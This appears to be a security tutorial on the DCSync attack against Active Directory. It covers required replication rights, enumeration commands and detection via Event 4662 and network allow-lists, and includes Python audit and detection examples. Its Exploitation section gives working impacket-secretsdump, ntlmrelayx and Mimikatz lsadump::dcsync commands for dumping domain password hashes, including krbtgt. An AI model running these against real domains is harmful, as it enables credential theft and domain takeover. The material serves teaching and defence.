The DCSync attack is a technique used by malicious actors to retrieve password hashes from a target domain controller in an Active Directory (AD) environment. This attack is based on abusing the DRSUAPI protocol, which is a part of the Microsoft Windows Active Directory replication process. Below, I’ll explain how the DCSync attack works, step by step, its requirements, and how to protect against it:

  • The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
  • By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
  • If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text.


The following high-level sequence of steps explains how a DCSync attack works, enabling attackers to take complete control of an organization’s AD infrastructure.

  • Compromise a standard or non-privileged user account with “Replicate Directory Changes” permission.
  • Discover a DC in the specified domain name.
  • Request the DC to replicate sensitive information such as password hashes using the Microsoft Directory Replication Service Remote (MS-DRSR) protocol.
  • Obtain NTLM hashes of potentially useful accounts such as KRBTGT and Administrators.
  • Create a Golden Ticket and run Pass the Ticket (PTT) attacks to move laterally.

A DCSync is not a simple copy-and-parse of the NTDS.dit file; it is a DsGetNCChanges operation carried in an RPC request to the DRSUAPI (Directory Replication Service API) that asks a domain controller to replicate data, credentials included.

Elements Involved:

  • Active Directory Domain Controller (DC): The target domain controller is a Windows server responsible for managing user accounts, authentication, and authorization in the AD environment.
  • DCSync Tool: Malicious actors use tools like “Mimikatz”, “PowerShell Empire” or “Impacket” to perform DCSync attacks. These tools have built-in functionality to request password hashes from the target DC.
  • Privileged Access: To execute a DCSync attack, an attacker typically needs high-level privileges within the AD environment, such as Domain Admin or equivalent permissions.

Requirements:

  • Privileged Access: The attacker needs to have high-level privileges in the AD environment to execute DCSync successfully.
  • The DCSync permission means holding these rights over the domain object itself: Replicating Directory Changes (DS-Replication-Get-Changes), Replicating Directory Changes All (DS-Replication-Get-Changes-All) or Replicating Directory Changes In Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set).
    • Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.
  • Additionally, any security principal with one of the following rights delegated at the domain level can also successfully retrieve password hash data using the DCSync attack.
    • GenericAll (Full Control)
    • AllExtendedRights
  • DCSync-Capable Tool: The attacker must have access to a tool with DCSync functionality, such as Mimikatz.
  • Network Access: The attacker needs network access to the target domain controller.


Enumeration

Enumeration (PowerView)

1. Query the domain information and copy the domain's distinguished name (here DC=vk9-sec,DC=com)

  • Get-ForestGlobalCatalog

2. Check who has Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set.

  • Get-ObjectAcl "DC=vk9-sec,DC=com" -ResolveGUIDs | ? {($_.ObjectAceType -like 'DS-Replication*')}
  • Get-ObjectAcl "DC=vk9-sec,DC=com" -ResolveGUIDs | ? {($_.ObjectAceType -like 'Replicating*')}
  • Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Note: if the target user's SID is already known, filter on it directly:

  • Get-ObjectAcl "DC=vk9-sec,DC=com" -ResolveGUIDs | ? {($_.ObjectAceType -like 'DS-Replication*') -and ($_.SecurityIdentifier -match '<SID>')}

3. Once an ACE with one of these rights is found, resolve its SecurityIdentifier to find out which account it belongs to

  • Get-ADUser -Identity S-1-5-21-3777574546-3462295754-3391741248-4192

Enumeration (AD module)

1. Any user holding one of the following extended rights can perform a DCSync attack:

  • DS-Replication-Get-Changes extended right (Rights-GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
  • DS-Replication-Get-Changes-All extended right (Rights-GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
  • DS-Replication-Get-Changes-In-Filtered-Set extended right (Rights-GUID 89e95b76-444d-4c62-991a-0facbeda640c)

2. Search the domain object's ACL for principals holding these rights

  • Import-Module ActiveDirectory
  • (Get-Acl "ad:\dc=vk9-sec,dc=com").Access | ? {($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) } | select IdentityReference

3. Query a specific user

  • (Get-Acl "ad:\dc=vk9-sec,dc=com").Access | ? {$_.IdentityReference -match 'user1' -and ($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) }
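The same audit can be run offline against an exported ACL. This is an added example, not code from the page or from any tool: export the domain object's ACEs with (Get-Acl "AD:\DC=vk9-sec,DC=com").Access | Export-Csv, then let the script aggregate them per principal and report the non-default ones. It goes a little beyond the GUID-only one-liners above: it also counts GenericAll and an ExtendedRight ACE carrying the null GUID (that is AllExtendedRights), both of which a filter on the three GUIDs misses, and it flags whether a principal holds both Get-Changes and Get-Changes-All, which is what dumping hashes requires. The CSV rows, the NetBIOS name VK9-SEC and the default-principal list are constructed/assumed and should be tuned to your forest.

```python
import csv
import io

# Rights-GUIDs of the three replication extended rights (from this page).
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
RIGHT_NAMES = {
    GET_CHANGES: "DS-Replication-Get-Changes",
    GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    GET_CHANGES_FILTERED: "DS-Replication-Get-Changes-In-Filtered-Set",
}
# An ExtendedRight ACE with the null GUID grants every extended right ("AllExtendedRights").
NULL_GUID = "00000000-0000-0000-0000-000000000000"

# Principals expected to hold replication rights. Assumption: a starting point only;
# the NetBIOS name VK9-SEC is taken from the page's example domain.
DEFAULT_PRINCIPALS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "BUILTIN\\Administrators",
    "VK9-SEC\\Domain Admins",
    "VK9-SEC\\Enterprise Admins",
    "VK9-SEC\\Domain Controllers",
    "VK9-SEC\\Enterprise Read-only Domain Controllers",
}


def rights_from_ace(ace):
    """Return the set of replication right names a single Allow ACE grants."""
    if ace["AccessControlType"] != "Allow":
        return set()
    ad_rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
    object_type = ace["ObjectType"].strip("{}").lower()
    if "GenericAll" in ad_rights:                 # full control on the domain object
        return set(RIGHT_NAMES.values())
    if "ExtendedRight" in ad_rights:
        if object_type == NULL_GUID:              # AllExtendedRights
            return set(RIGHT_NAMES.values())
        if object_type in RIGHT_NAMES:
            return {RIGHT_NAMES[object_type]}
    return set()


def audit_replication_rights(csv_text, defaults=DEFAULT_PRINCIPALS):
    """Aggregate ACEs per principal and report the ones not in the default list.

    Returns {identity: {"rights": [...], "can_dump_secrets": bool}}; dumping
    password hashes needs both Get-Changes and Get-Changes-All.
    """
    per_identity = {}
    for ace in csv.DictReader(io.StringIO(csv_text)):
        granted = rights_from_ace(ace)
        if granted:
            per_identity.setdefault(ace["IdentityReference"], set()).update(granted)
    report = {}
    for identity, rights in per_identity.items():
        if identity in defaults:
            continue
        report[identity] = {
            "rights": sorted(rights),
            "can_dump_secrets": {"DS-Replication-Get-Changes",
                                 "DS-Replication-Get-Changes-All"} <= rights,
        }
    return report


# Constructed sample in the shape Export-Csv gives for Get-Acl ... .Access rows.
SAMPLE_ACL_CSV = r'''"IdentityReference","ActiveDirectoryRights","ObjectType","AccessControlType"
"VK9-SEC\Domain Admins","ExtendedRight","1131f6aa-9c07-11d1-f79f-00c04fc2dcd2","Allow"
"VK9-SEC\Domain Admins","ExtendedRight","1131f6ad-9c07-11d1-f79f-00c04fc2dcd2","Allow"
"NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS","ExtendedRight","1131f6aa-9c07-11d1-f79f-00c04fc2dcd2","Allow"
"VK9-SEC\user1","ExtendedRight","1131f6aa-9c07-11d1-f79f-00c04fc2dcd2","Allow"
"VK9-SEC\user1","ExtendedRight","1131f6ad-9c07-11d1-f79f-00c04fc2dcd2","Allow"
"VK9-SEC\svc_backup","ExtendedRight","00000000-0000-0000-0000-000000000000","Allow"
"VK9-SEC\helpdesk","GenericAll","00000000-0000-0000-0000-000000000000","Allow"
"VK9-SEC\user2","ReadProperty, ListChildren","00000000-0000-0000-0000-000000000000","Allow"
"VK9-SEC\user3","ExtendedRight","1131f6ad-9c07-11d1-f79f-00c04fc2dcd2","Deny"
'''

if __name__ == "__main__":
    for identity, info in audit_replication_rights(SAMPLE_ACL_CSV).items():
        print(identity, info)
```

On the sample, user1 (both rights), svc_backup (AllExtendedRights) and helpdesk (GenericAll) are reported; Domain Admins and ENTERPRISE DOMAIN CONTROLLERS are skipped as defaults, user2 holds nothing relevant and user3's ACE is a Deny. Inherited ACEs and nested group membership are not expanded here; resolve group members separately before deciding who actually holds the right.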

Exploitation

Exploitation (Impacket / Remote)

1. With the credentials of a user holding the DS-Replication-Get-Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set permissions, we can extract the domain's credentials:

  • impacket-secretsdump <Domain>/<Username>:<Password>@<IP> -just-dc
  • impacket-secretsdump vk9-sec.com/user1:Admin.123@192.168.0.110 -just-dc

2. To write the output to a file, use -outputfile:

  • impacket-secretsdump vk9-sec.com/user1:Admin.123@192.168.0.110 -just-dc -outputfile <filename>

3. We can also pass the hash instead of a password:

  • impacket-secretsdump -outputfile 'something' -hashes 'LMhash':'NThash' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'

4. We can also attempt Pass-the-Ticket (Kerberos authentication with -k):

  • secretsdump -k -outputfile 'something' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'

5. This attack can also be operated with a relayed NTLM authentication, but only if the target domain controller is vulnerable to Zerologon since the DRSUAPI always requires signing.

# target vulnerable to Zerologon, dump DC’s secrets only

  • ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER'

# target vulnerable to Zerologon, dump Domain’s secrets

  • ntlmrelayx.py -t dcsync://’DOMAINCONTROLLER’ -auth-smb ‘DOMAIN’/’LOW_PRIV_USER’:’PASSWO

Errors

1. When the credentials are wrong

2. When the Permissions are invalid

Exploitation (Mimikatz / Local)

1. Once the account is delegated the ability to replicate objects, the account can run Mimikatz DCSync:

# Extract a specific user, in this case the krbtgt

  • lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
  • lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:Administrator

# Dump everything (printed in a short and readable format)

  • lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /all /csv

Note: On Windows, Mimikatz's lsadump::dcsync module performs the DCSync and can recover the krbtgt keys, for example for a golden ticket attack. For this to work, the Mimikatz command should run in an elevated context (i.e. through runas with a plaintext password, pass-the-hash or pass-the-ticket).

Detection

Auditing

One method is to monitor Windows event logs for Event ID 4662. Logs are an important part of security, but using them to monitor across the IT environment has significant challenges.

  • Security Event ID 4662 (Audit Policy for object must be enabled) – An operation was performed on an object
  • Security Event ID 5136 (Audit Policy for object must be enabled) – A directory service object was modified
  • Security Event ID 4670 (Audit Policy for object must be enabled) – Permissions on an object were changed

To detect a DCSync from Security Event ID 4662, check the following field values:

  • SubjectUserName – “The subject fields indicate the account on the local system which requested the logon.”
  • AccessMask – will be 0x100, which means Control Access: access is allowed only after the extended-rights checks supported by the object are performed.
  • Properties – holds two pieces of information. The first is the type of access that was used, which typically has the same value as the Accesses field (here %%7688); the second is a tree of GUIDs of the Active Directory classes or property sets on which the operation was performed. The second part is the one to check: whether any GUID matches the DS-Replication-Get-Changes, DS-Replication-Get-Changes-All or DS-Replication-Get-Changes-In-Filtered-Set extended right.
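The field checks above, turned into code as an added example (not from the page or from any vendor product): it parses 4662 records in Windows Event XML form (what Get-WinEvent ... | ForEach-Object { $_.ToXml() } returns), keeps only Control Access (0x100) operations whose Properties carry one of the three replication GUIDs, and suppresses known DC computer accounts, since DC-to-DC replication raises the same event. The XML samples, the DC account names and the helper that builds the samples are constructed.

```python
import xml.etree.ElementTree as ET

EVENT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Rights-GUIDs of the replication extended rights, as listed on this page.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask value for "Control Access" (extended-rights check)
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of the domainDNS class


def parse_security_event(xml_text):
    """Extract the fields the detection needs from one event in Windows Event XML."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.iter(f"{EVENT_NS}Data")}
    # Properties = an access-type token (%%7688) followed by one {GUID} per line.
    guids = {
        line.strip().strip("{}").lower()
        for line in data.get("Properties", "").splitlines()
        if "{" in line
    }
    return {
        "event_id": int(root.findtext(f"{EVENT_NS}System/{EVENT_NS}EventID")),
        "computer": root.findtext(f"{EVENT_NS}System/{EVENT_NS}Computer"),
        "subject": f"{data.get('SubjectDomainName', '')}\\{data.get('SubjectUserName', '')}",
        "access_mask": int(data.get("AccessMask", "0"), 16),
        "guids": guids,
    }


def dcsync_finding(event, dc_accounts):
    """Return a finding when a 4662 shows a Control Access check on a replication
    right by a principal that is not a known DC computer account, else None."""
    if event["event_id"] != 4662 or event["access_mask"] != CONTROL_ACCESS:
        return None
    matched = sorted(name for g, name in REPLICATION_RIGHTS.items() if g in event["guids"])
    if not matched:
        return None
    if event["subject"].upper() in {a.upper() for a in dc_accounts}:
        return None  # ordinary DC-to-DC replication
    return {"subject": event["subject"], "on": event["computer"], "rights": matched}


def scan(events_xml, dc_accounts):
    """Run the check over a batch of events and keep the hits."""
    findings = [dcsync_finding(parse_security_event(x), dc_accounts) for x in events_xml]
    return [f for f in findings if f]


def sample_event(user, mask, guids):
    """Constructed 4662 record in Windows Event XML shape; not a real capture."""
    props = "%%7688\n" + "".join(f"\t{{{g}}}\n" for g in guids)
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4662</EventID><Computer>DC01.vk9-sec.com</Computer></System>
<EventData>
<Data Name="SubjectUserName">{user}</Data>
<Data Name="SubjectDomainName">VK9-SEC</Data>
<Data Name="ObjectServer">DS</Data>
<Data Name="AccessMask">{mask}</Data>
<Data Name="Properties">{props}</Data>
</EventData></Event>"""


# Constructed: the DC computer accounts (what Get-ADDomainController would list).
DC_ACCOUNTS = {"VK9-SEC\\DC01$", "VK9-SEC\\DC02$"}
SAMPLE_EVENTS = [
    # a non-DC user requesting Get-Changes + Get-Changes-All on the domain object
    sample_event("user1", "0x100", list(REPLICATION_RIGHTS)[:2] + [DOMAIN_DNS_CLASS]),
    # a DC replicating from another DC: same GUIDs, but an allow-listed account
    sample_event("DC02$", "0x100", list(REPLICATION_RIGHTS)[:2] + [DOMAIN_DNS_CLASS]),
    # an ordinary read on the domain object, no control-access check
    sample_event("user2", "0x10", [DOMAIN_DNS_CLASS]),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(finding)
```

Only the user1 event is reported. Besides the DC computer accounts, any legitimate replication consumer in the environment (for example the Azure AD Connect / Entra Connect synchronization account) has to be added to the allow-list, or it will surface on every sync cycle; the audit policy for Directory Service Access must be on, or 4662 is never written in the first place.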

Detecting DCSync usage

While there may be event activity that could be used to identify DCSync usage, the best detection method is through network monitoring.

1. Identify all Domain Controller IP addresses and add them to a “Replication Allow List”.

  • Get-ADDomainController -filter * | select IPv4Address
  • [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | select IPAddress

2. Configure the IDS to trigger when a DsGetNCChanges request originates from an IP that is not on the “Replication Allow List” (the list of DC IPs).
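The allow-list check from steps 1 and 2 in code, as an added example that is not part of the page: given the DC IPs from Get-ADDomainController, flag every DsGetNCChanges call whose source is not one of them. The input records are constructed to look like Zeek's dce_rpc.log (tab-separated, endpoint drsuapi, operation DRSGetNCChanges); that layout and naming are an assumption about your sensor, and 192.168.0.111 is an invented second DC next to the page's 192.168.0.110.

```python
# DRSUAPI interface UUID e3514235-4b06-11d1-ab04-00c04fc2dcd2; DsGetNCChanges is opnum 3.
REPLICATION_OPERATIONS = {"DRSGetNCChanges"}

# Assumption: Zeek dce_rpc.log field order, tab-separated.
FIELDS = ["ts", "uid", "src", "src_port", "dst", "dst_port",
          "rtt", "named_pipe", "endpoint", "operation"]


def parse_dce_rpc_log(log_text):
    """Yield one dict per record, skipping Zeek's '#' header/footer lines."""
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split("\t")
        if len(values) < len(FIELDS):
            continue  # malformed or truncated record
        yield dict(zip(FIELDS, values))


def replication_alerts(log_text, dc_ips):
    """Return DsGetNCChanges calls whose source is not an allow-listed DC."""
    alerts = []
    for rec in parse_dce_rpc_log(log_text):
        if rec["endpoint"] != "drsuapi" or rec["operation"] not in REPLICATION_OPERATIONS:
            continue
        if rec["src"] in dc_ips:
            continue  # DC-to-DC replication is expected traffic
        alerts.append({"ts": rec["ts"], "src": rec["src"],
                       "dst": rec["dst"], "operation": rec["operation"]})
    return alerts


# Constructed allow-list, as Get-ADDomainController -Filter * | select IPv4Address would give.
DC_IPS = {"192.168.0.110", "192.168.0.111"}

# Constructed sample records (not a real capture).
SAMPLE_DCE_RPC_LOG = (
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\trtt\tnamed_pipe\tendpoint\toperation\n"
    "1700000000.123\tCAbc1\t192.168.0.110\t49160\t192.168.0.111\t49667\t0.001\t-\tdrsuapi\tDRSGetNCChanges\n"
    "1700000001.456\tCDef2\t192.168.0.50\t52010\t192.168.0.110\t49667\t0.002\t-\tdrsuapi\tDRSGetNCChanges\n"
    "1700000002.789\tCGhi3\t192.168.0.50\t52011\t192.168.0.110\t49667\t0.001\t-\tdrsuapi\tDRSBind\n"
    "1700000003.000\tCJkl4\t192.168.0.60\t40000\t192.168.0.110\t445\t0.003\t-\tlsarpc\tLsarLookupNames\n"
)

if __name__ == "__main__":
    for alert in replication_alerts(SAMPLE_DCE_RPC_LOG, DC_IPS):
        print(alert)
```

Only the call from 192.168.0.50 is flagged; the DRSBind from the same host is not a replication request by itself. Keep the allow-list in step with DC promotions and demotions: a DC missing from it raises a false positive on every replication cycle, and a retired DC's address left in it is a blind spot if that address is reused.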

Protection Against DCSync Attacks:

  • Implement Least Privilege: Limit the number of accounts with high-level privileges like Domain Admins to reduce the potential impact of privilege escalation.
  • Regularly Rotate Passwords: Frequently change the passwords of privileged accounts to make it more difficult for attackers to maintain access.
  • Monitor for Anomalies: Implement robust monitoring and auditing of AD events. Look for suspicious activities such as unusual replication requests or privilege escalations.
  • Restrict Network Access: Limit network access to domain controllers to only trusted systems and administrators.
  • Endpoint Security: Employ endpoint security solutions to detect and prevent credential theft and malicious activity.
  • Limit Tool Availability: Restrict the availability of tools with DCSync capabilities to trusted administrators and systems.
  • Limit the number of security principals with replication rights to only those that absolutely require those rights.
  • Regularly review and audit your AD environment to identify non-default security principals with these rights and remove any unnecessary permissions.
